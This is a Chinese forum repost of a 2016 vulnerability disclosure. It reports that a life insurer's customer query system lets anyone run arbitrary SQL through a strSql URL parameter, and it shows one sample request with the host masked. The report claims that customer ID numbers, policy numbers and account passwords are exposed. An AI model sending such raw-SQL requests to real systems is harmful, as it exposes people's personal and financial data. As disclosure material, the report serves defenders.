HanDs
管理员

[7月漏洞公开] 中荷人寿某系统设计不当可直接可执行SQL影响账号密码及大量客户保单信息 



设计不当

详细说明:

**.**.**.**:8443/cusQuery/

QQ截图20160530214733.png



**.**.**.**:8443/cusQuery/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select+TABLE_NAME,NUM_ROWS+from+tabs&strStart=1&LargeFlag=0

QQ截图20160530214835.png

漏洞证明:

身份证信息&保单号

QQ截图20160530214944.png



帐号密码

QQ截图20160530215135.png



修复方案:

补丁


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
成杓撇
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:0
游客组
快速回复